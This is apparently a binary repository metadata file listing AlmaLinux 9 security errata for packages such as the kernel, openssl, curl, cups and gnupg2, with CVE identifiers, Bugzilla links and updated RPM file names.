�'��rBsecurityModerate: cups security update� ��}�https://access.redhat.com/errata/RHSA-2026:0312RHSA-2026:0312RHSA-2026:0312https://access.redhat.com/security/cve/CVE-2025-58436CVE-2025-58436CVE-2025-58436https://access.redhat.com/security/cve/CVE-2025-61915CVE-2025-61915CVE-2025-61915https://bugzilla.redhat.com/24160392416039https://bugzilla.redhat.com/24160402416040https://errata.almalinux.org/9/ALSA-2026-0312.htmlALSA-2026:0312ALSA-2026:0312�+�qcups-libs-2.3.3op2-34.el9_7.2.i686.rpm�+�qcups-libs-2.3.3op2-34.el9_7.2.x86_64.rpm�+�qcups-libs-2.3.3op2-34.el9_7.2.i686.rpm�+�qcups-libs-2.3.3op2-34.el9_7.2.x86_64.rpm�˩�r�l
�(��uBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ���0
https://access.redhat.com/errata/RHSA-2026:0445RHSA-2026:0445RHSA-2026:0445https://access.redhat.com/security/cve/CVE-2025-39806CVE-2025-39806CVE-2025-39806https://access.redhat.com/security/cve/CVE-2025-39840CVE-2025-39840CVE-2025-39840https://access.redhat.com/security/cve/CVE-2025-39883CVE-2025-39883CVE-2025-39883https://access.redhat.com/security/cve/CVE-2025-40240CVE-2025-40240CVE-2025-40240https://bugzilla.redhat.com/23958072395807https://bugzilla.redhat.com/23969362396936https://bugzilla.redhat.com/23975532397553https://bugzilla.redhat.com/24188322418832https://errata.almalinux.org/9/ALSA-2026-0445.htmlALSA-2026:0445ALSA-2026:0445nkernel-debug-modules-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-modules-extra-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-core-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-modules-extra-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-tools-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-modules-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-abi-stablelists-5.14.0-611.20.1.el9_7.noarch.rpmnkernel-tools-libs-5.14.0-611.20.1.el9_7.x86_64.rpm%nkernel-uki-virt-addons-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-modules-core-5.14.0-611.20.1.el9_7.x86_64.rpm!nkernel-modules-core-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-5.14.0-611.20.1.el9_7.x86_64.rpm nkernel-debug-uki-virt-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-core-5.14.0-611.20.1.el9_7.x86_64.rpm"nkernel-uki-virt-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-modules-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-modules-extra-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-core-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-modules-extra-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-tools-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-modules-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-abi-stablelists-5.14.0-611.20.1.el9_7.noarch.rpmnkernel-tools-libs-5.14.0-611.20.1.el9_7.x86_64.rpm%nkernel-uki-virt-addons-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-modules-core-5.14.0-611.20.1.el9_7.x86_64.rpm!nkernel-modules-core-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-5.14.0-611.20.1.el9_7.x86_64.rpm nkernel-debug-uki-virt-5.14.0-611.20.1.el9_7.x86_64.rpmnkernel-debug-core-5.14.0-611.20.1.el9_7.x86_64.rpm"nkernel-uki-virt-5.14.0-611.20.1.el9_7.x86_64.rpm�˩�X�m
�)��TsecurityImportant: gnupg2 security update� '��/�bhttps://access.redhat.com/errata/RHSA-2026:0719RHSA-2026:0719RHSA-2026:0719https://access.redhat.com/security/cve/CVE-2025-68973CVE-2025-68973CVE-2025-68973https://bugzilla.redhat.com/24259662425966https://errata.almalinux.org/9/ALSA-2026-0719.htmlALSA-2026:0719ALSA-2026:0719�e�#gnupg2-2.3.3-5.el9_7.x86_64.rpm�e�#gnupg2-2.3.3-5.el9_7.x86_64.rpm�˧�i�n
�*��VBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update� '���+https://access.redhat.com/errata/RHSA-2026:0793RHSA-2026:0793RHSA-2026:0793https://access.redhat.com/security/cve/CVE-2025-38703CVE-2025-38703CVE-2025-38703https://access.redhat.com/security/cve/CVE-2025-39933CVE-2025-39933CVE-2025-39933https://access.redhat.com/security/cve/CVE-2025-40277CVE-2025-40277CVE-2025-40277https://access.redhat.com/security/cve/CVE-2025-68285CVE-2025-68285CVE-2025-68285https://access.redhat.com/security/cve/CVE-2025-68287CVE-2025-68287CVE-2025-68287https://bugzilla.redhat.com/23931572393157https://bugzilla.redhat.com/24014322401432https://bugzilla.redhat.com/24199542419954https://bugzilla.redhat.com/24227882422788https://bugzilla.redhat.com/24228012422801https://errata.almalinux.org/9/ALSA-2026-0793.htmlALSA-2026:0793ALSA-2026:0793okernel-debug-modules-extra-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-modules-extra-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-tools-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-abi-stablelists-5.14.0-611.24.1.el9_7.noarch.rpmokernel-debug-core-5.14.0-611.24.1.el9_7.x86_64.rpm okernel-debug-uki-virt-5.14.0-611.24.1.el9_7.x86_64.rpm%okernel-uki-virt-addons-5.14.0-611.24.1.el9_7.x86_64.rpm"okernel-uki-virt-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-modules-5.14.0-611.24.1.el9_7.x86_64.rpm!okernel-modules-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-modules-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-modules-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-tools-libs-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-modules-extra-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-modules-extra-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-tools-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-abi-stablelists-5.14.0-611.24.1.el9_7.noarch.rpmokernel-debug-core-5.14.0-611.24.1.el9_7.x86_64.rpm okernel-debug-uki-virt-5.14.0-611.24.1.el9_7.x86_64.rpm%okernel-uki-virt-addons-5.14.0-611.24.1.el9_7.x86_64.rpm"okernel-uki-virt-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-modules-5.14.0-611.24.1.el9_7.x86_64.rpm!okernel-modules-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-modules-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-debug-modules-core-5.14.0-611.24.1.el9_7.x86_64.rpmokernel-tools-libs-5.14.0-611.24.1.el9_7.x86_64.rpm�����o
�+��uBsecurityModerate: glib2 security update� ��<�https://access.redhat.com/errata/RHSA-2026:0936RHSA-2026:0936RHSA-2026:0936https://access.redhat.com/security/cve/CVE-2025-13601CVE-2025-13601CVE-2025-13601https://bugzilla.redhat.com/24167412416741https://errata.almalinux.org/9/ALSA-2026-0936.htmlALSA-2026:0936ALSA-2026:0936�X�glib2-2.68.4-18.el9_7.1.i686.rpm�X�glib2-2.68.4-18.el9_7.1.x86_64.rpm�X�glib2-2.68.4-18.el9_7.1.i686.rpm�X�glib2-2.68.4-18.el9_7.1.x86_64.rpm����d�p
��9��8securityImportant: python-urllib3 security update� '��Y�7https://access.redhat.com/errata/RHSA-2026:1087RHSA-2026:1087RHSA-2026:1087https://access.redhat.com/security/cve/CVE-2025-66418CVE-2025-66418CVE-2025-66418https://access.redhat.com/security/cve/CVE-2025-66471CVE-2025-66471CVE-2025-66471https://access.redhat.com/security/cve/CVE-2026-21441CVE-2026-21441CVE-2026-21441https://bugzilla.redhat.com/24194552419455https://bugzilla.redhat.com/24194672419467https://bugzilla.redhat.com/24277262427726https://errata.almalinux.org/9/ALSA-2026-1087.htmlALSA-2026:1087ALSA-2026:1087�L�python3-urllib3-1.26.5-6.el9_7.1.noarch.rpm�L�python3-urllib3-1.26.5-6.el9_7.1.noarch.rpm����
�q
�,��zBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update� '���https://access.redhat.com/errata/RHSA-2026:1143RHSA-2026:1143RHSA-2026:1143https://access.redhat.com/security/cve/CVE-2025-38141CVE-2025-38141CVE-2025-38141https://access.redhat.com/security/cve/CVE-2025-38349CVE-2025-38349CVE-2025-38349https://access.redhat.com/security/cve/CVE-2025-38731CVE-2025-38731CVE-2025-38731https://access.redhat.com/security/cve/CVE-2025-40248CVE-2025-40248CVE-2025-40248https://access.redhat.com/security/cve/CVE-2025-40258CVE-2025-40258CVE-2025-40258https://access.redhat.com/security/cve/CVE-2025-40294CVE-2025-40294CVE-2025-40294https://access.redhat.com/security/cve/CVE-2025-68301CVE-2025-68301CVE-2025-68301https://access.redhat.com/security/cve/CVE-2025-68305CVE-2025-68305CVE-2025-68305https://bugzilla.redhat.com/23760522376052https://bugzilla.redhat.com/23818702381870https://bugzilla.redhat.com/23934882393488https://bugzilla.redhat.com/24188722418872https://bugzilla.redhat.com/24188762418876https://bugzilla.redhat.com/24198912419891https://bugzilla.redhat.com/24228362422836https://bugzilla.redhat.com/24228402422840https://errata.almalinux.org/9/ALSA-2026-1143.htmlALSA-2026:1143ALSA-2026:1143%pkernel-uki-virt-addons-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-modules-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-tools-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-5.14.0-611.26.1.el9_7.x86_64.rpm pkernel-debug-uki-virt-5.14.0-611.26.1.el9_7.x86_64.rpm!pkernel-modules-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-extra-5.14.0-611.26.1.el9_7.x86_64.rpm"pkernel-uki-virt-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-abi-stablelists-5.14.0-611.26.1.el9_7.noarch.rpmpkernel-modules-extra-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-tools-libs-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-core-5.14.0-611.26.1.el9_7.x86_64.rpm%pkernel-uki-virt-addons-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-modules-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-tools-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-5.14.0-611.26.1.el9_7.x86_64.rpm pkernel-debug-uki-virt-5.14.0-611.26.1.el9_7.x86_64.rpm!pkernel-modules-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-extra-5.14.0-611.26.1.el9_7.x86_64.rpm"pkernel-uki-virt-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-abi-stablelists-5.14.0-611.26.1.el9_7.noarch.rpmpkernel-modules-extra-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-core-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-tools-libs-5.14.0-611.26.1.el9_7.x86_64.rpmpkernel-debug-modules-core-5.14.0-611.26.1.el9_7.x86_64.rpm���;�r
�-��YBBBBBBBBsecurityModerate: curl security update� ��-�Ahttps://access.redhat.com/errata/RHSA-2026:1350RHSA-2026:1350RHSA-2026:1350https://access.redhat.com/security/cve/CVE-2025-9086CVE-2025-9086CVE-2025-9086https://bugzilla.redhat.com/23947502394750https://errata.almalinux.org/9/ALSA-2026-1350.htmlALSA-2026:1350ALSA-2026:1350�)�Ncurl-7.76.1-35.el9_7.3.x86_64.rpm{�Nlibcurl-7.76.1-35.el9_7.3.x86_64.rpm|�Nlibcurl-minimal-7.76.1-35.el9_7.3.i686.rpm�*�Ncurl-minimal-7.76.1-35.el9_7.3.x86_64.rpm{�Nlibcurl-7.76.1-35.el9_7.3.i686.rpm|�Nlibcurl-minimal-7.76.1-35.el9_7.3.x86_64.rpm�)�Ncurl-7.76.1-35.el9_7.3.x86_64.rpm{�Nlibcurl-7.76.1-35.el9_7.3.x86_64.rpm|�Nlibcurl-minimal-7.76.1-35.el9_7.3.i686.rpm�*�Ncurl-minimal-7.76.1-35.el9_7.3.x86_64.rpm{�Nlibcurl-7.76.1-35.el9_7.3.i686.rpm|�Nlibcurl-minimal-7.76.1-35.el9_7.3.x86_64.rpm���
�s
�.��cBBBsecurityImportant: openssl security update� '��n�Lhttps://access.redhat.com/errata/RHSA-2026:1473RHSA-2026:1473RHSA-2026:1473https://access.redhat.com/security/cve/CVE-2025-11187CVE-2025-11187CVE-2025-11187https://access.redhat.com/security/cve/CVE-2025-15467CVE-2025-15467CVE-2025-15467https://access.redhat.com/security/cve/CVE-2025-15468CVE-2025-15468CVE-2025-15468https://access.redhat.com/security/cve/CVE-2025-15469CVE-2025-15469CVE-2025-15469https://access.redhat.com/security/cve/CVE-2025-66199CVE-2025-66199CVE-2025-66199https://access.redhat.com/security/cve/CVE-2025-68160CVE-2025-68160CVE-2025-68160https://access.redhat.com/security/cve/CVE-2025-69418CVE-2025-69418CVE-2025-69418https://access.redhat.com/security/cve/CVE-2025-69419CVE-2025-69419CVE-2025-69419https://access.redhat.com/security/cve/CVE-2025-69420CVE-2025-69420CVE-2025-69420https://access.redhat.com/security/cve/CVE-2025-69421CVE-2025-69421CVE-2025-69421https://access.redhat.com/security/cve/CVE-2026-22795CVE-2026-22795CVE-2026-22795https://access.redhat.com/security/cve/CVE-2026-22796CVE-2026-22796CVE-2026-22796https://bugzilla.redhat.com/24303752430375https://bugzilla.redhat.com/24303762430376https://bugzilla.redhat.com/24303772430377https://bugzilla.redhat.com/24303782430378https://bugzilla.redhat.com/24303792430379https://bugzilla.redhat.com/24303802430380https://bugzilla.redhat.com/24303812430381https://bugzilla.redhat.com/24303862430386https://bugzilla.redhat.com/24303872430387https://bugzilla.redhat.com/24303882430388https://bugzilla.redhat.com/24303892430389https://bugzilla.redhat.com/24303902430390https://errata.almalinux.org/9/ALSA-2026-1473.htmlALSA-2026:1473ALSA-2026:1473��}openssl-libs-3.5.1-7.el9_7.i686.rpm��}openssl-libs-3.5.1-7.el9_7.x86_64.rpm�:�}openssl-3.5.1-7.el9_7.x86_64.rpm��}openssl-libs-3.5.1-7.el9_7.i686.rpm��}openssl-libs-3.5.1-7.el9_7.x86_64.rpm�:�}openssl-3.5.1-7.el9_7.x86_64.rpm�̂��t
�/��hBBBsecurityModerate: python3.9 security update� ��:�bhttps://access.redhat.com/errata/RHSA-2026:1478RHSA-2026:1478RHSA-2026:1478https://access.redhat.com/security/cve/CVE-2025-12084CVE-2025-12084CVE-2025-12084https://bugzilla.redhat.com/24186552418655https://errata.almalinux.org/9/ALSA-2026-1478.htmlALSA-2026:1478ALSA-2026:1478��python3-3.9.25-3.el9_7.x86_64.rpm-�python3-libs-3.9.25-3.el9_7.x86_64.rpm-�python3-libs-3.9.25-3.el9_7.i686.rpm��python3-3.9.25-3.el9_7.x86_64.rpm-�python3-libs-3.9.25-3.el9_7.x86_64.rpm-�python3-libs-3.9.25-3.el9_7.i686.rpm����r�u
�0��mBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ���Dhttps://access.redhat.com/errata/RHSA-2026:1617RHSA-2026:1617RHSA-2026:1617https://access.redhat.com/security/cve/CVE-2025-38568CVE-2025-38568CVE-2025-38568https://access.redhat.com/security/cve/CVE-2025-40154CVE-2025-40154CVE-2025-40154https://access.redhat.com/security/cve/CVE-2025-40251CVE-2025-40251CVE-2025-40251https://bugzilla.redhat.com/23895072389507https://bugzilla.redhat.com/24144942414494https://bugzilla.redhat.com/24188922418892https://errata.almalinux.org/9/ALSA-2026-1617.htmlALSA-2026:1617ALSA-2026:1617qkernel-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-abi-stablelists-5.14.0-611.27.1.el9_7.noarch.rpm qkernel-debug-uki-virt-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-5.14.0-611.27.1.el9_7.x86_64.rpm"qkernel-uki-virt-5.14.0-611.27.1.el9_7.x86_64.rpm%qkernel-uki-virt-addons-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-tools-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-tools-libs-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-extra-5.14.0-611.27.1.el9_7.x86_64.rpm!qkernel-modules-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-modules-extra-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-modules-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-abi-stablelists-5.14.0-611.27.1.el9_7.noarch.rpm qkernel-debug-uki-virt-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-5.14.0-611.27.1.el9_7.x86_64.rpm"qkernel-uki-virt-5.14.0-611.27.1.el9_7.x86_64.rpm%qkernel-uki-virt-addons-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-tools-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-tools-libs-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-extra-5.14.0-611.27.1.el9_7.x86_64.rpm!qkernel-modules-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-modules-extra-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-modules-core-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-modules-5.14.0-611.27.1.el9_7.x86_64.rpmqkernel-debug-core-5.14.0-611.27.1.el9_7.x86_64.rpm�̖�L�v
�1��LBBBBBBBBBBBBBBBBBBBsecurityModerate: util-linux security update� ��`�https://access.redhat.com/errata/RHSA-2026:1913RHSA-2026:1913RHSA-2026:1913https://access.redhat.com/security/cve/CVE-2025-14104CVE-2025-14104CVE-2025-14104https://bugzilla.redhat.com/24193692419369https://errata.almalinux.org/9/ALSA-2026-1913.htmlALSA-2026:1913ALSA-2026:1913
��util-linux-user-2.37.4-21.el9_7.x86_64.rpm��util-linux-core-2.37.4-21.el9_7.x86_64.rpm�<�libsmartcols-2.37.4-21.el9_7.x86_64.rpm�<�libsmartcols-2.37.4-21.el9_7.i686.rpm�8�libmount-2.37.4-21.el9_7.x86_64.rpm�@�libuuid-2.37.4-21.el9_7.x86_64.rpm��util-linux-2.37.4-21.el9_7.x86_64.rpm�8�libmount-2.37.4-21.el9_7.i686.rpm�,�libblkid-2.37.4-21.el9_7.i686.rpm�1�libfdisk-2.37.4-21.el9_7.i686.rpm�@�libuuid-2.37.4-21.el9_7.i686.rpm�1�libfdisk-2.37.4-21.el9_7.x86_64.rpm�,�libblkid-2.37.4-21.el9_7.x86_64.rpm
��util-linux-user-2.37.4-21.el9_7.x86_64.rpm��util-linux-core-2.37.4-21.el9_7.x86_64.rpm�<�libsmartcols-2.37.4-21.el9_7.x86_64.rpm�<�libsmartcols-2.37.4-21.el9_7.i686.rpm�8�libmount-2.37.4-21.el9_7.x86_64.rpm�@�libuuid-2.37.4-21.el9_7.x86_64.rpm��util-linux-2.37.4-21.el9_7.x86_64.rpm�8�libmount-2.37.4-21.el9_7.i686.rpm�,�libblkid-2.37.4-21.el9_7.i686.rpm�1�libfdisk-2.37.4-21.el9_7.i686.rpm�@�libuuid-2.37.4-21.el9_7.i686.rpm�1�libfdisk-2.37.4-21.el9_7.x86_64.rpm�,�libblkid-2.37.4-21.el9_7.x86_64.rpm�̫�I�w
�2��aBsecurityImportant: brotli security update� '��|�https://access.redhat.com/errata/RHSA-2026:2042RHSA-2026:2042RHSA-2026:2042https://access.redhat.com/security/cve/CVE-2025-6176CVE-2025-6176CVE-2025-6176https://bugzilla.redhat.com/24087622408762https://errata.almalinux.org/9/ALSA-2026-2042.htmlALSA-2026:2042ALSA-2026:2042�-�Xlibbrotli-1.0.9-9.el9_7.x86_64.rpm�-�Xlibbrotli-1.0.9-9.el9_7.i686.rpm�-�Xlibbrotli-1.0.9-9.el9_7.x86_64.rpm�-�Xlibbrotli-1.0.9-9.el9_7.i686.rpm�̒�4�x
�3��dBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ���u"https://access.redhat.com/errata/RHSA-2026:2212RHSA-2026:2212RHSA-2026:2212https://access.redhat.com/security/cve/CVE-2025-37789CVE-2025-37789CVE-2025-37789https://access.redhat.com/security/cve/CVE-2025-37819CVE-2025-37819CVE-2025-37819https://access.redhat.com/security/cve/CVE-2025-38022CVE-2025-38022CVE-2025-38022https://access.redhat.com/security/cve/CVE-2025-38024CVE-2025-38024CVE-2025-38024https://access.redhat.com/security/cve/CVE-2025-38403CVE-2025-38403CVE-2025-38403https://access.redhat.com/security/cve/CVE-2025-38415CVE-2025-38415CVE-2025-38415https://access.redhat.com/security/cve/CVE-2025-38459CVE-2025-38459CVE-2025-38459https://access.redhat.com/security/cve/CVE-2025-38730CVE-2025-38730CVE-2025-38730https://access.redhat.com/security/cve/CVE-2025-39760CVE-2025-39760CVE-2025-39760https://access.redhat.com/security/cve/CVE-2025-40135CVE-2025-40135CVE-2025-40135https://access.redhat.com/security/cve/CVE-2025-40141CVE-2025-40141CVE-2025-40141https://access.redhat.com/security/cve/CVE-2025-40158CVE-2025-40158CVE-2025-40158https://access.redhat.com/security/cve/CVE-2025-40170CVE-2025-40170CVE-2025-40170https://access.redhat.com/security/cve/CVE-2025-40269CVE-2025-40269CVE-2025-40269https://access.redhat.com/security/cve/CVE-2025-40271CVE-2025-40271CVE-2025-40271https://access.redhat.com/security/cve/CVE-2025-40318CVE-2025-40318CVE-2025-40318https://bugzilla.redhat.com/23633152363315https://bugzilla.redhat.com/23650322365032https://bugzilla.redhat.com/23733262373326https://bugzilla.redhat.com/23733542373354https://bugzilla.redhat.com/23834042383404https://bugzilla.redhat.com/23834212383421https://bugzilla.redhat.com/23834872383487https://bugzilla.redhat.com/23931912393191https://bugzilla.redhat.com/23946012394601https://bugzilla.redhat.com/24145062414506https://bugzilla.redhat.com/24145212414521https://bugzilla.redhat.com/24145222414522https://bugzilla.redhat.com/24145232414523https://bugzilla.redhat.com/24198372419837https://bugzilla.redhat.com/24199192419919https://bugzilla.redhat.com/24199202419920https://errata.almalinux.org/9/ALSA-2026-2212.htmlALSA-2026:2212ALSA-2026:2212"rkernel-uki-virt-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-modules-5.14.0-611.30.1.el9_7.x86_64.rpm!rkernel-modules-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-abi-stablelists-5.14.0-611.30.1.el9_7.noarch.rpmrkernel-debug-modules-extra-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-modules-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-modules-extra-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-modules-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-core-5.14.0-611.30.1.el9_7.x86_64.rpm%rkernel-uki-virt-addons-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-tools-libs-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-tools-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-5.14.0-611.30.1.el9_7.x86_64.rpm rkernel-debug-uki-virt-5.14.0-611.30.1.el9_7.x86_64.rpm"rkernel-uki-virt-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-modules-5.14.0-611.30.1.el9_7.x86_64.rpm!rkernel-modules-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-abi-stablelists-5.14.0-611.30.1.el9_7.noarch.rpmrkernel-debug-modules-extra-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-modules-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-modules-extra-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-modules-core-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-core-5.14.0-611.30.1.el9_7.x86_64.rpm%rkernel-uki-virt-addons-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-tools-libs-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-tools-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-debug-5.14.0-611.30.1.el9_7.x86_64.rpmrkernel-5.14.0-611.30.1.el9_7.x86_64.rpm rkernel-debug-uki-virt-5.14.0-611.30.1.el9_7.x86_64.rpm�̶�/�y
�4��CBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ���https://access.redhat.com/errata/RHSA-2026:2722RHSA-2026:2722RHSA-2026:2722https://access.redhat.com/security/cve/CVE-2023-53034CVE-2023-53034CVE-2023-53034https://access.redhat.com/security/cve/CVE-2025-40064CVE-2025-40064CVE-2025-40064https://access.redhat.com/security/cve/CVE-2025-40304CVE-2025-40304CVE-2025-40304https://access.redhat.com/security/cve/CVE-2025-40322CVE-2025-40322CVE-2025-40322https://access.redhat.com/security/cve/CVE-2025-68349CVE-2025-68349CVE-2025-68349https://access.redhat.com/security/cve/CVE-2025-68811CVE-2025-68811CVE-2025-68811https://access.redhat.com/security/cve/CVE-2026-22998CVE-2026-22998CVE-2026-22998https://bugzilla.redhat.com/23602392360239https://bugzilla.redhat.com/24067472406747https://bugzilla.redhat.com/24198702419870https://bugzilla.redhat.com/24199022419902https://bugzilla.redhat.com/24248802424880https://bugzilla.redhat.com/24291162429116https://bugzilla.redhat.com/24326712432671https://errata.almalinux.org/9/ALSA-2026-2722.htmlALSA-2026:2722ALSA-2026:2722skernel-abi-stablelists-5.14.0-611.34.1.el9_7.noarch.rpmskernel-modules-5.14.0-611.34.1.el9_7.x86_64.rpm"skernel-uki-virt-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-extra-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-5.14.0-611.34.1.el9_7.x86_64.rpm skernel-debug-uki-virt-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-modules-extra-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-tools-5.14.0-611.34.1.el9_7.x86_64.rpm%skernel-uki-virt-addons-5.14.0-611.34.1.el9_7.x86_64.rpm!skernel-modules-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-tools-libs-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-abi-stablelists-5.14.0-611.34.1.el9_7.noarch.rpmskernel-modules-5.14.0-611.34.1.el9_7.x86_64.rpm"skernel-uki-virt-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-extra-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-5.14.0-611.34.1.el9_7.x86_64.rpm skernel-debug-uki-virt-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-modules-extra-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-modules-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-tools-5.14.0-611.34.1.el9_7.x86_64.rpm%skernel-uki-virt-addons-5.14.0-611.34.1.el9_7.x86_64.rpm!skernel-modules-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-debug-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-core-5.14.0-611.34.1.el9_7.x86_64.rpmskernel-tools-libs-5.14.0-611.34.1.el9_7.x86_64.rpm���:�z
